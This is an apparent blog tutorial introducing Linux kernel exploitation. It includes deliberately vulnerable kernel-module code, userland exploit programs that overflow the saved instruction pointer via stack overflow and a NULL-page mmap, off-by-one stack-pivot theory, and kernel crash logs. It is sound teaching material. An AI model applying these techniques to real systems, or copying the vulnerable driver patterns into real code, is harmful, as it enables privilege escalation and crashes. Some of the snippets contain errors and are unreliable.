What is kernel exploitation ?!⌗

Vulnerable syscalls⌗

Kernel exploitation is the exploitation of security flaws in ring 0. The techniques used in order to exploit this kind of vulnerability are a bit different from exploiting a userland application. And when you begin, it can be a bit hard to understand. In ring 0 or in “kernel land” relies the internals of your operating system. For example a userland application pass execution to kernel land for many purposes, such hardware access or native/privileged features of your operating system:

/* Small x86-64 application in nasm */

global _start

_start:
    xor rdi, rdi ; // set rdi to zero
    mov rax, 60 ; // syscall number for exit
    syscall ; // <- entry in kernel land for exit(0)

The 60 moved into rax represents the index of a “system call” in the syscall table. The first parameter of the syscall function is passed into rdi according to the abi the next parameters are put in the registers : rsi, rdx, r8 and r9. These parameters may be missused and can potentally lead to a vulnerability which can be exploited !!!

Vulnerable devices⌗

As seen previously, you can exploit a vulnerable syscall from userland without problems, but there are also two other kind of kernel land programs which can be used in order to increase your privileges: loadable kernel modules (LKM) and devices. We will not cover the exploitation of LKM which are not registered as a device and which are a bit different to handle. Basically, there is two main techniques which allow you to send data to a device :

Open the device and having a file descriptor on the target device, and use the a syscall read / write in order to trigger the function linked as the read / write handler. To trigger a vulnerability in the function which will deal with the read / write actions of our userland program according to the syscall we are using. Basic payload structure for such exploits:


#include <stdio.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
  
#define VULN_DEVICE "/dev/im_vuln" // vuln name
#define LEN_CRASH 64
#define LEN_READ 256

int main(){
  int fd = open(VULN_DEVICE, O_RDWR); // Open in write / read
  
  char rbuf[LEN_READ];
  
  unsigned long *pld = malloc(LEN_CRASH);
  
  memset(pld, 0x41, LEN_CRASH);
  
  /* Some basic check */
  
  read(fd, rbuf, LEN_READ); // Request data from kernel, trigger the read handler
  
  write(fd, pld, LEN_CRASH); // Send data to the kernel, trigger the write handler
  
  /* Theorically if the vuln is triggered, the code below is never reached */
  
  close(fd);
  free(pld);

  return 0;
}

Sure, this structure depends of the vulnerability which affects your device. Asking for 256 bytes can for example cause a particular behaviour which will make that the call to write just next will be vulnerable.

Or you can interact with your device with the ioctl syscall. To interact with your device with ioctl you must fill at least the above parameters:


int ioctl(int fd, unsigned long request, char *arg);

/*
* The fd field represents your open file descriptor on your driver.
*
* The requests field represents the command that you want to execute
* (you will see it deeper in the code).
*
* Finally the arg pointer can be any variable, the only mandary thing is that 
* the kernel code in your device which will handle your argument and your request 
* according to the type and the value of these variables.
*/

And because practicing is more clear let’s write a device which will handle the calls to ioctl:


#include <linux/init.h>
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/uaccess.h>
#include <linux/fs.h>
#include <linux/miscdevice.h>

#define WRITE 2
#define READ 3

static const struct file_operations f = {
  /* ... */
  .unlocked_ioctl = vuln_ioctl,
  /* vuln_ioctl is registered as the ioctl handler, it will be called at every ioctl request from userland */
};

typedef struct ioctl_read {
  unsigned long length;
  unsigned char *rbuf;
} read_ioctl;

static int write(void __user *argp);
static int read(void __user *argp);

static long vuln_ioctl(struct file *file, unsigned int request, const char __user *arg_user){
  int ret;
  read_ioctl *argp = (read_ioctl *)arg_user;

  switch (request) {
    case WRITE:
      ret = write(argp);
      break;
    case READ:
      ret = read(argp);
      break;
    default:
      ret = -1; /* Invalid request */
  }

  /* 
  *  So request and argp can be anything according
  *  to the fact that in your code the value of request
  *  and argp are correctly handled
  */

  return ret;

}

static int write(read_ioctl __user *argp) {

  /* 
  *  Some dangerous stuff with argp
  */ 

  return 0;
}

#define LEN_STR 28

static int read(read_ioctl __user *argp) {
  /*
  *  This function will just copy either the argp->lenth bytes
  *  of kstr in argp->rbuf or if argp->length > LEN_STR, it will
  *  just copy all the string in order to prevent bugs.
  */ 

  const char *kstr = "I'm a string in kernel land";

  if (argp->length >= LEN_STR) {
      if (-1 == copy_to_user(argp->rbuf, kstr, LEN_STR)) {
        printk(KERN_INFO "[ERROR READ]\n");
        return -1;
      }

      return 0;
  }

  /* If the code below is reached, argp->length < LEN_STR */

  if (-1 == copy_to_user(argp->rbuf, kstr, argp->length)) {
    printk(KERN_INFO "[ERROR READ]\n");
    return -1;
  }

  return 0;
}

  /* ... */

Typically, if we want to read / send data from / to a device which is handling our ioctl requests we have to build a structure like this:

/* 
*  We are just taking the same code that previously
*  but we send data with ioctl
*/

#include <stdio.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define VULN_DEVICE "/dev/im_vuln"
#define LEN_CRASH 64
#define LEN_READ 256

#define WRITE 2
#define READ 3

/* Same request than the code in kernel land */

typedef struct ioctl_read {
  unsigned long length;
  unsigned char *rbuf;
} read_ioctl;

int main(){
  int fd = open(VULN_DEVICE, O_RDWR); /* Open in write / read */

  read_ioctl r_arg = {0};

  r_arg.rbuf = malloc(LEN_READ);

  read_ioctl.length = LEN_READ;
  memset(read_ioctl.rbuf, 0x0, LEN_READ);

  unsigned long *pld = malloc(LEN_CRASH);

  memset(pld, 0x41, LEN_CRASH);

  ioctl(fd, READ, &r_arg);

  /*
  *  We send a READ request which will be interpreted as 
  *  seen above. And then, the read_ioctl->length-n bytes 
  *  will be copied in read_ioctl->rbuf.
  */

  ioctl(fd, WRITE, pld);

  /* 
  *  Same thing that for READ, the WRITE request is 
  *  handled by in our example the write handler.
  */ 

  close(fd);
  free(read_ioctl.rbuf);
  free(pld);

  return 0;
}

Of course, the goal of this part is not to explain how devices are developed and only a few concepts are mandatory for sending our payloads in kernel land. So if you are interested in linux kernel developpement and if you want to learn more about linux kernel exploit developpement, you can look at this bunch of links below:

Understanding linux kernel, one of the most important book about the the linux internals especially for memory management and process structure. But be careful, this book covers the 2.x.x linux kernel and is so a bit old.
Linux kernel developpement, a book focused on KLM developement very interesting for the beginners and is a bit more recent that the last one.
Understanding the Linux Virtual Memory Manager, a book about the functioning of the linux virtual memory allocator. But be careful he is a bit more advanced. There is too some stuff with dynamic memory allocators (slab / slub / slob).
A Guide to Kernel Exploitation Attacking the Core, a reference book kernel exploitation for beginners I guess that it’s one of the most important resource for learning kernel exploitation. Unfortunately, he is quite old and today the exploitation techniques have changed but for kernel below that 4.x.x, it stay a bit the same thing.
Paper about ret2dir attacks, very interesting paper about how to exploit your kernel with re2dir attack.
Reverse Engineering 4 Beginners, if you are not familiar with intel assembly programming and that you don’t know anything about Reverse Engineering it’s important for be ready to begin kernel exploitation that you know a few basics knowledge about it.
phrack Kernel Exploitation notes, a few interested notes from phrack about kernel exploitation and is a good overview of the different kind of vulnerabilities that you can find in kernel land and how to exploit them.
CVE-2017-11176 A step-by-step Linux Kernel exploitation by lexfo security (1, 2, 3, 4), very big resource for learning kernel exploitation, these 4 parts are too a good entry point in kernel exploitation.
Professional Linux Kernel Architecture, important book on linux kernel internals. He looks like Understanding linux kernel but is a bit more advanced on certain chapters.

Now that you have learned how send data to your device we will see a few vulnerabilities which can affects your device and any syscall in kernel land.

Vulnerabilities⌗

Because this page is only an introduction made only in order to give you a very basic knowledge about kernel exploitation. A next part will be related to each kind vulnerability, and will go deeper in the explainaition of the exploitation techniques.

Stack Buffer Overflows⌗

A stack buffer overflow is a very common vulnerability that you have already seen in userland programs ( if you don’t know anything about it I think that beginning kernel exploitation is not very safe and you should more take a look at ropemporium ). In Kernel-land, a stack overflow appears as in Userland when you try to write in a buffer which you have allocated N bytes more than N and that so you can overwrite the saved instruction pointer. We will not go deeper in the explainaition of this kind of bugs but we will see how you can trigger the vulnerability and then exploit her.

Typically, a stack buffer overflow is often the result of functions such strcpy() / memcpy() in userland or directly dangerous loops. For example, the kernel function used to copy a buffer from userland to kernel land is often copy_from_user((void *to, const __user *from, unsigned long n);, let’s dig more in the internals of this function:


unsigned long copy_from_user (void *to, const __user *from, unsigned long n);

/* void *to is a Kernel land buffer to whom n bytes from the  
*  const __user *from userland buffer will be copied.
*  Note: The copy_from_user function checks the arguments in order to prevent 
*  overflows as we can see below. 
*/

static __always_inline unsigned long __must_check
copy_from_user(void *to, const void __user *from, unsigned long n)
{
  if (likely(check_copy_size(to, n, false)))
    n = _copy_from_user(to, from, n);
  return n;
}

/* The check_copy_size(to, n, false) looks like it */

static __always_inline __must_check bool
check_copy_size(const void *addr, size_t bytes, bool is_source)
{
  int sz = __compiletime_object_size(addr);

  /* __compiletime_object_size(addr) returns the length of the object 
  *  pointed by addr (addr can whatever in the object), it's possible 
  *  if only for objects whose ranges can be determinated at 
  *  compile time.
  */
  if (unlikely(sz >= 0 && sz < bytes)) {
    /* n > Our buffer -> Overflow */
  }
  if (WARN_ON_ONCE(bytes > INT_MAX))
    /*Max value for an int -> crazy behaviour -> error*/
    return false;

  check_object_size(addr, bytes, is_source);
  
  /* The check_object_size will try to determine if the object is a valid
  *  object in the stack/heap and if addr + bytes stays in the stack frame.
  *  According to the fact that for example if (addr + bytes) 
  *  > stackend, check_copy_size will abort the copy or return.
  */

  return true;
}

/* Now take a look at _copy_from_user(to, from, n);
*  
*/ 

_copy_from_user(void *to, const void __user *from, unsigned long n)
{
  /* likely() and unlikely() are just macros 
  *  who are saying to the cpu:
  *  - if(likely(condition)) { This code 
  *  is basically executed there is not
  *  conditional jmp toward another memory
  *  page which is potentially not in the cache
  *  and which will make that the execution will
  *  be slower}
  *  - In opposition to likely(condition), unlikely(condition)
  *  will make that:
  *  
  *  if(unlikely(!func(0x1337))) {
  *      return 0;
  *  }
  * 
  *  else { 
  *    return 1337;
  *  }
  *
  *
  *  At runtime it's equivalent to:
  *
  *  if(func(0x1337)){
  *  /* In assembly it looks like it:
  *  *  call func
  *  *  cmp rax, 0x0
  *  *  je so_far_else
  *  *  mov rax, 1337
  *  *  ret
  *  * 
  *  *  In assembly we can see that when the unlikely condition
  *  *  is true, the execution is a bit slower because the address
  *  *  of else can be in another page not in the TLB 
  *  *  (translation lookaside buffer). It's too used by the branch prediction
  *  *  feature of you processor for know if it must evaluate the jmp.
  *  *
  *  /
  *    return 1337; 
  *  }
  *  else { 
  *  /* This label can be in another page
  *  *  the jmp here is 'unlikely' and is a 
  *  *  bit more slow.
  *  /
  *    return 0;
  *  }
  *
  *
  */ 

  unsigned long res = n;
  might_fault();
  if (likely(access_ok(from, n))) {
    /* does we can access n bytes from from ? */
    kasan_check_write(to, n);
    /* does we can write n bytes to to ? */

    /* All check have been done 
    *  We can call the final function.
    */

    res = raw_copy_from_user(to, from, n); 
  }  
  
  /* When res is equal to zero the data has been copied, else 
  *  it's that the previous condition is not taken and so res = number
  *  of bytes to copy.
  */

  if (unlikely(res))
    memset(to + (n - res), 0, res);

    /* 
    *  If there is an error, the kernel land buffer 
    *  is filled with NULL bytes.
    */

  return res; /* 0 on success and n on error */
}

/* the raw_copy_from_user(to, from, n) is just: */

static inline unsigned long
raw_copy_from_user(void *to, const void __user *from, unsigned long len)
{
  return __copy_user(to, (__force const void *)from, len);
}

/* 
*  Finally raw_copy_from_user is just a call to __copy_user (a memcpy) 
*  And __copy_from_user is just a call to raw_copy_from_user with less checks 
*/

static __always_inline __must_check unsigned long
__copy_from_user(void *to, const void __user *from, unsigned long n)
{
	might_fault();
	kasan_check_write(to, n);
	check_object_size(to, n, false);
	return raw_copy_from_user(to, from, n);
}

All this quest is just led in order to make you understanding that copy_from_user is just a call to memcpy with a lot of checks. But for clarity we are using raw_copy_from_user and not directly memcpy when we want to create dangerous behaviours.

We will see the two cases in a dangerous write handler of a device:

/* Same structure than previously */
typedef struct write_buf {  
  unsigned long length;
  unsigned char *rbuf;
} wr_struct;

static int vuln1_write(struct file *file, const char __user *buf, size_t user_count, loff_t *offt) {
  unsigned char vuln_buf[LEN_MAX];
  memset(vuln_buf, 0x0, LEN_MAX);
  /* We fill the vuln_buf of 0x0 */

  wr_struct *argp = (wr_struct *)buf; /* We are getting the user's arg */

  /*
  *  if (raw_copy_from_user(vuln_buf, (const char __user *)argp->rbuf, user_count)) {
  *     return -1;
  *  }
  *
  *  If we uncomment it, the crash will occur and the code below will not
  *  be executed, but the for loop or any equivalent while loop will create 
  *  the same dangerous behaviour.
  *
  *
  *  raw_copy_from_user(vuln_buf, (const char __user *)argp->rbuf, user_count) call is very 
  *  dangerous because if the user_count send by the user is bigger than LEN_MAX,
  *  the vuln_write's stack frame will be overflowed.
  *  And it can overwrite the saved instruction pointer and redirect the control flow !! 
  */

  int i=0;
  for (i=0; i < argp->length; i++) {
    vuln_buf[i] = argp->rbuf[i];
    printk("%x", vuln_buf[i]);
  }

  /* 
  *  Just above, we can notice that the for loop is looping on argp->length in 
  *  order to copy argp->length bytes from our userland buffer in the kernel-land 
  *  buffer vuln_buf and if argp->length > LEN_MAX, into the vuln_write's local variables and even further !.
  *  Tt can be dangerous if it allow us to overwrite and control the saved instruction
  *  pointer at the top of the stackframe.
  */

  return 0;
}

Now that we know how to send a payload to a write handler we can write the payload below without any issues:

/* exploit.c */

#include <stdio.h>
#include <stdarg.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>

#define LEN 250

typedef struct write_buf {  
  unsigned long length;
  unsigned char *rbuf;
} wr_struct;

int main(){
  int fd = open("/dev/vuln1", O_RDWR);

  wr_struct to_send;
  to_send.length = LEN;

  to_send.rbuf = malloc(LEN);
  memset(to_send.rbuf, 0xff, LEN);

  if (write(fd, &to_send, LEN) == -1) {
      printf("[Error sending pld]\n");
      return -1;
  }

  printf("[pld send]\n");

  close(fd);
  free(to_send.rbuf);

  return 0;
}

We have just to compile the KLM, and load it in kernel land with insmod:

# make
make -C /lib/modules/3.19.0-31-generic/build SUBDIRS=/media/sf_C-C++/pwn_stuff/Kernel_Exploit/vuln1 modules
make[1]: Entering directory '/usr/src/linux-headers-3.19.0-31-generic'
  Building modules, stage 2.
  MODPOST 1 modules
make[1]: Leaving directory '/usr/src/linux-headers-3.19.0-31-generic'
# insmod main.ko <- Load the kernel module in memory
# gcc exploit.c -g -o pld
# ./pld
Segmentation fault
# dmesg # <- Command used to display kernel logs
[47655.844948] vuln1: Init
[47729.624822] [Open]
[47729.624946] fffffffffffffffffffffffffff [...]
[47729.625118] general protection fault: 0000 [#12] 
[47729.625122] SMP 
[...]
[47729.625171] task: ffff88007a0dbae0 ti: ffff8800692d4000 task.ti: ffff8800692d4000
[49382.393576] RIP: 0010:[ffffffffffffffff]  [ffffffffffffffff] 0xffffffffffffffff
[49382.393584] RSP: 0018:ffff880069333ee8  EFLAGS: 00010246
[49382.393588] RAX: 0000000000000000 RBX: ffffffffffffffff RCX: 0000000000002f06
[49382.393592] RDX: 000000000000bdfc RSI: 0000000000000246 RDI: 0000000000000246
[49382.393595] RBP: ffffffffffffffff R08: ffffffff81ed7120 R09: 000000000000fffd
[49382.393599] R10: 000000000000102f R11: 000000000000000f R12: ffffffffffffffff
[49382.393602] R13: 00000000000000e0 R14: ffff880069333f50 R15: 0000000000000000
[49382.393608] FS:  00007f9a9c255700(0000) GS:ffff88009d800000(0000) knlGS:0000000000000000
[49382.393612] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[49382.393616] CR2: ffffffffffffffff CR3: 00000000691f6000 CR4: 00000000000406f0
[49382.393625] Stack:
[49382.393627]  ffffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffff
[49382.393634]  ffffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffff
[49382.393640]  ffffffffffffffff ffffffffffffffff ffffffffffffffff ffffffffffffffff
[49382.393646] Call Trace:
[49382.393661]  [ffffffff817b6dcd] ? system_call_fastpath+0x16/0x1b
[49382.393664] Code:  Bad RIP value.
[49382.393672] RIP  [ffffffffffffffff] 0xffffffffffffffff
[49382.393678]  RSP ffff880069333ee8
[49382.393681] CR2: ffffffffffffffff
[49382.393687] ---[ end trace 6f00dcc0b67af37c ]---

Just above we see a lot of interesting things, all our stack is filled with a lot of 0xff from our argp->rbuf, rbp, rbx and r12 are too filled with 0xff because they have been pop at the end of the function. And finally we have seen that rip has been pop at the end of the function and so held the value 0xffffffffffffffff.

Congratz !! Now that we have triggered this write handler, we must compute the offset from which rip is overwritten.

But for now it was just an introduction to the exploitation of this kind of vulnerabilities and if you want to go deeper, take a look at the next part.

Off by one/two⌗

An off by one/two vulnerability occurs when an object is overflowed by only one or two bytes. Typically we can find this kind of vulnerabilities in a loop:


typedef struct write_buf {
  char rbuf[LEN];
  unsigned long length;
} wr_struct;

/* ... */

#define LEN 64

static int vuln1_write(struct file *file, const char __user *buf, size_t user_count, loff_t *offt) {
  wr_struct *argp = (wr_struct *)buf;
  unsigned char *k_write = kzalloc(argp->length);

  /* The developper tries to be secure lulz */

  for (ssize_t i = 0; i <= argp->length; i++) {
    k_write[i] = argp->rbuf[i];
  }

  kfree(k_write);

  /* Other version of the code without dynamic allocation */

  unsigned char vuln_buf[argp->length];

  for (ssize_t i = 0; i <= LEN; i++) {
    vuln_buf[i] = argp->rbuf[i];
  }

  return 0;

}

As shown above, the off by one appears in the heap because we are allocating our buffer on the kernel heap with kzmalloc or on the stack. The <= makes that if i begins to 0, it will loop from 0 until LEN and so the loop will be executed LEN plus one time. And it leads to an overflow because when an object is of length LEN as seen above, the dereferencement is done on LEN+1 bytes and so the byte next to the buffer on the stack or on the heap can be overwritten. In order to make crash this program above, it’s basically the same thing that for a stack based buffer overflow. The difference is that an off by one / two is often not exploitable as we will see later.

But for now it’s very important to understand that the sructure of a function is always composed of: one prologue and one epilogue. In intel 64 bits assembly a prologue looks like it:

push rbp
mov rbp, rsp

The first instruction is putting our save of rbp on the stack. The second instruction is saving the value of rsp in order to edit this register in the function for creating new local variables. And will restores this value at the end of the function.

The epilogue looks like it:

leave

// leave is equal to:
//            mov rsp, rbp
//            pop rbp ; <- The saved value of rbp, pushed on the stack
//                    ; at the begin of the function is retablished.

ret

The leave instruction will restore the previous value of the stack pointer and so detroy all the local variables created in our function by pushing them on the stack and restores the previous value of rbp with the pop rbp. Finally the ret instruction will pop the value on the stack in rip and so execute the instruction pointed by this address. And our goal is to overwrite either the value on the stack when the ret instruction is executed or for off by one / two heap based overflow, overwrite sensible data in the heap.

For now we will focused our exploitation on off by one / two stack based overflow because heap exploitation depends to the version and the type of your kernel allocator. But we must solve one main constraint: we can overflow only one or two bytes, so how to overlow the saved instruction pointer if there is the saved rbp (base pointer) just before ? And how to do if next to the vulnerable buffer on the stack there is another variable ?

The answer is that for many reasons an off by one is not exploitable but I will try to explain when it is.

An off by one is exploitable when:

[1] The vulnerable buffer is just next to the saved rbp.
[2] With the [1] constraint, we can overwrite the first bytes of the saved rbp. But the goal is to overwrite the saved rip or that when the ret instruction is executed, having the control of the value on the top of the stack. In order to do that, we will use a stack pivoting technique. Stack pivoting is just replacing the original rsp by a custom stack pointer that we control. And for our case, we will use the only register that we can control by our on-byte-overflow. It can be done by many gadgets but for off by one exploitation it’s often a leave, because he contains as seen above the mov rsp, rbp instruction Without this gadget the exploitation can’t be done. The particularity is that the gadget must not be in the vulnerable function but in one of the calling functions. Indeed, when the mov rsp, rbp occurs in the vulnerable function the base pointer hasn’t been pop yet. And so we can’t control it. But next this instruction, the previous value of rbp saved on the stack at the begin of the function is retablished in rbp. And when the execution returns to the calling functions the value of rbp back and next the call of our vulnerable function is different. And we control the one or two lower bytes !! It’s so when the epilogue of the function which has called the vulnerable function come, that often, if this function has local variables the mov rsp, rbp is reached.

The schema below presents it a bit more clearly:

In {1}, just before the call to our vulnerable foo function the value of rbp is the same that next the mov rbp, rsp instruction from the prologue. And can be for example: 0xffff880069333ee8

In {2}, the execution is transfered to the code of the foo function and the the value of the instruction next the call instruction in the calling function is pushed on the stack.

In {3}, the prologue of the foo function is executed, the saved based pointer is pushed on the stack. And a new stackframe is created.

In {4}, the vulnerable loop is executed and the one / two lower bytes of the saved rbp are overflowed on the stack. Especially because of the [1] constraint.

In {5}, the epilogue is executed, the leave instrcution destroys all the local variables and pop the saved rbp pushed in the prologue.

In {6}, the value of the base pointer is so different, it’s still a stack address, but the one / two lower bytes are edited. If we take the random value set previously, before the begin of the foo function, rbp == 0xffff880069333ee8 and now the 0xe8 or the 0x3ee8 bytes can be controlled. And the execution returns to the calling function by poping the saved instruction pointer in rip. The instruction next the call are executed.

Finally the leave instruction, is executing the mov rsp, rbp instruction. But the time with a rbp value partially controlled. The final constraint is so to find a memory area in the stackframe of any functions that we control and which will be used as a custom stack. But if we can overflow only one byte, the range is very limited and depends to the value of the base pointer when the overflow occurs.

In our example the value of rbp when the overflow occurs is of 0xffff880069333ee8 and we can control only the last byte. The 0xffff880069333e is so the base address we can only change a very small offset. One byte represents a range of 255 possibilities And so in the stackframe of the calling function, we can make stack pivoting only on 0xe8 bytes because of the lifo structure of the stack. Indeed, it grows down. So more the last byte of the saved rbp is small, less we have place for finding a location for our custom stack in the stackframe of the calling function. But a solution can be to search a memory area in the calling function of the calling function. With this technique we can use a memory area from the saved rbp around 2^8 bytes for an off by one and around 2^16 bytes for an off by two.

NULL pointer dereference⌗

A NULL pointer dereference vulnerability occurs when you try to access to some data located at address 0x0. For example if a structure’s pointer is inititialized to 0x0 and that you try to dereference it.

/* vuln1.c */

#define LEN_MAX 16

/* ... */

static ssize_t vuln1_write(struct file *file, const char __user *buf, size_t user_count, loff_t *offt) {

  unsigned char k_buf[LEN_MAX];
  ssize_t i;

  wr_struct *argp = (wr_struct *)buf;

  if (argp->length > LEN_MAX) {
    printk(KERN_INFO "[OVERFLOW DETECTED]\n");
    return -1;
  }

  /* The length is checked to avoid overflows :) */

  argp = NULL;

  /* Init to NULL the pointer toward the struct */

  for (i = 0x0; i < (unsigned long)argp->length; i++) {
    k_buf[i] = argp->rbuf[i];
  }

  /* NULL pointer dereference for each iteration */

  return 0;
}

It will try to dereference a pointer in a struct located at 0x0. Indeed argp->rbuf[i] is equivalent to *(*((unsigned long *)(argp + offsetof(argp->rbuf))) + i * sizeof(unsigned char)). So there are therefore two dereferencements, the first to know the address toward which rbuf points. The second to read the byte (unsigned char) at this address plus the counter (loop counter). The interesting thing is that we can control the bytes at 0x0 if the mmap_min_addr system variable is set to 0x0 (can only be edited when ur root). Its value can be edited (it’s usually the case on modern system) to prevent the exploitation of NULL pointers dereferences. But here we will assume that we can use the mmap syscall to map a page at 0x0 and so handle the bytes at this location. It can a bit hard to understand for now, but the address space space of program is segmented in pages of length 0x1000 (bytes) to which are associated some flags especially permissions like is the page executable, is it writable, it belongs to the kernel or not. A virtual address is segmented a few parts according to the level of paging choosen by your operating system (often 4 on 64 bits os). These 4 levels of paging are just table of pointers toward the lower structures where some bits in these pointers are used as boolean flags (not the 64 bits are mandatory to address physically the lower structures). And finnaly the lower structure is pointing toward the physical address of the target page to which is added the last 12 bits of the virtual address (0 to 11). The virtual address is so segmented as a first offset of 12 bits (offset in 2^12=4096 page length), four fields of 9 bits each one which are just an offset in each paging structure (2^9 = 512 entries, entry n is determined by BITS_VADDR * sizeof(unsigned char *) because each entry is a pointer). Finally the cr3 register holds the physical base address of the first paging structure (pmle4) it’s mandatory because when it’s changed, all the address space is switched (used in context switchs).

But it’s another subject which will be described in another article and for now you have just to understand that a process is just sharing the pages where the kernel is mapped with the other processes and so when the execution is in kernel land, you can easily access and dereference pointers from userland (not always the case especially with the smap protection) because of the fact that cr3 isn’t changed (or it is when KPTI is enabled but the userpages are then mapped in the kernel address space with the NX bit). So if we mmap something at 0x0, when the execution will reach the kernel all the paging structures of the callee process will be kept (and so all the userland pages will be able to be handled by the kernel). That’s why a NULL pointer dereference is exploitable. We have juste craft a new wr_struct structure at 0x0, edit the length field to overflow the saved instruction pointer and craft a payload to which its address is handled by the rbuf field of the structure.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <assert.h>
#include <sys/ioctl.h>

/* 
*  exploit.c
*  author: nasm 
*/
  
typedef struct write_buf {
  unsigned long length;
  unsigned char *rbuf;
} wr_struct;

int main() {

    int fd;
    wr_struct to_send = {0}; 
    /* The basic structure we send (we need to setup only to_send.length) */
    wr_struct *struct_nullp = NULL; 
    /* The structure we are crafting at 0x0 from userland */
    unsigned long *pld = NULL; 
    /* A pointer toward the location which will overflow the vuln1_write's saved rip */

    if ((fd = open("/dev/vuln1", O_RDWR)) < 0x0) {
        printf("Error open\n");
        return -1;
    }

    to_send.length = 0x10; 
    /* must be lower than LEN_MAX */

    unsigned char *null_pointer = mmap(0x0, 1024, PROT_READ | PROT_WRITE , 
    MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS , -1, 0x0);

    struct_nullp = (wr_struct *)null_pointer;
    /* Easier to handle with the fields of a struct and not raw offsets */ 

    struct_nullp->length = 0x28+sizeof(unsigned char *); 
    /* 
    *  crash from 0x28 bytes to which we add the length of the 
    *  pointer we want to erase (saved rip) 
    */

    struct_nullp->rbuf = malloc(0x28+0x8);
    /* Same than for the length */

    pld = struct_nullp->rbuf+0x28;
    /*
    *  Handle directly the address from which the saved rip will be overwritten
    */

    *pld = (unsigned long)0x1337;
    /*
    *  Invalid pointer which will leads to a crash but interesting pattern
    */

    if (-1 == write(fd, &to_send, to_send.length)) {
        printf("[Error sending pld]\n");
        return -1;
    }

    printf("[pld send]\n");

    close(fd);
    free(struct_nullp->rbuf);

    if (-1 == munmap(null_pointer, 1024)) {
      return -1;
    }

    return 0;
}

I will not comment all the code, only the main parts, we need to setup two structures: the first to reach the check on the argp->length field and the second mapped at 0x0, it will overflow the stack frame of the target function by creating the same wr_struct and putting the length and rbuf fields to overflow the saved rip and redirect the control flow. To do this we have to know from which offset rip is overwritten. For this purpose we can at the assembly of the vuln1_write function produced by gcc with IDA:

There is no need to comment all the assembly code but you may notice something, the ds:vuln1_ioctl operand in IDA means 0x0 (because the reloc addr of vuln1_ioctl is zero). The compiler hasn’t initialized the initial struct pointer (in rsi) to zero but has the opimized the two fields to be directly at the address 0x0(base)+0x0(offset in the struct) for the length and to the address 0x0(base)+0x8(offset of rbuf in the struct, the length field is an unsigned long) for buf (loc_5+3=8). The interesting part is for us only the prologue and the epilogue of the function, firstly it pushs three registers and allocates 0x10 bytes for the local variables, and if we want to be sure to know from which offset rip is overwritten we can look at the epilogue where it will just destroy the previous allocations. So the saved instruction is overwritten from 3 * 8 + 0x10 (three registers plus the space for the local variables) which give us 40 or 0x28. Now that we have this precious information, we need to use mmap to map our structure at 0x0. For this we use the MAP_FIXED argument which permit us to map some pages at a particular virtual address. At 0x0 we begin to craft our structure by putting the length field to 0x28+8 to overflow only the saved instruction pointer. Next we take a pointer toward the bytes which will overflow the saved rip to initialize them to 0x1337 (nice pattern (: ). Now we just have to compile the exploit and launch it, and as seen below we obtain a crash with a nice invalid rip :).

[ 5398.893290] BUG: unable to handle kernel paging request at 0000000000001337
[ 5398.893590] PGD 8000000043111067 P4D 8000000043111067 PUD 4617b067 PMD 43771067 PTE 0
[ 5398.893713] Oops: 0010 [#5] SMP PTI
[ 5398.893818] CPU: 0 PID: 1317 Comm: exploit Tainted: G      D    OE     4.19.0-8-amd64 #1 Debian 4.19.98-1
[ 5398.894229] Hardware name: innotek GmbH VirtualBox/VirtualBox, BIOS VirtualBox 12/01/2006
[ 5398.894438] RIP: 0010:0x1337
[ 5398.894662] Code: Bad RIP value.
[ 5398.894933] RSP: 0018:ffffc9000064fed8 EFLAGS: 00010286
[ 5398.895153] RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000006
[ 5398.895463] RDX: 0000000000000000 RSI: 0000000000000082 RDI: ffff88804a6166b0
[ 5398.895673] RBP: 0000000000000000 R08: 00000000000005eb R09: 0000000000aaaaaa
[ 5398.896001] R10: 0000000000000000 R11: ffffc9000109f020 R12: 0000000000000000
[ 5398.896187] R13: ffffc9000064ff08 R14: 00007ffd164b6020 R15: 0000000000000000
[ 5398.896395] FS:  00007fc6ae32a500(0000) GS:ffff88804a600000(0000) knlGS:0000000000000000
[ 5398.896599] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 5398.896809] CR2: 000000000000130d CR3: 0000000034140002 CR4: 00000000000206f0
[ 5398.897033] Call Trace:
[ 5398.897261]  ? ksys_write+0x57/0xd0
[ 5398.897512]  ? do_syscall_64+0x53/0x110
[ 5398.897749]  ? entry_SYSCALL_64_after_hwframe+0x44/0xa9

Summary⌗

To summarize we’ve cover only the basics and we advice you to take a look at the links section. We have only seen how to trigger vulns like buffer overflows, off by one/two, NULL pointer dereferences … That are very basics vulnerabilities and for more advanced subjects you can look at the articles. If you have questions, please join my discord server or dm me on twitter.

Special thanks to sensei @m_101 and @aassfxxx for technical advices and to @medievalghoul for reviewing the english !!

~ cheers, nasm

Introduction to kernel exploitation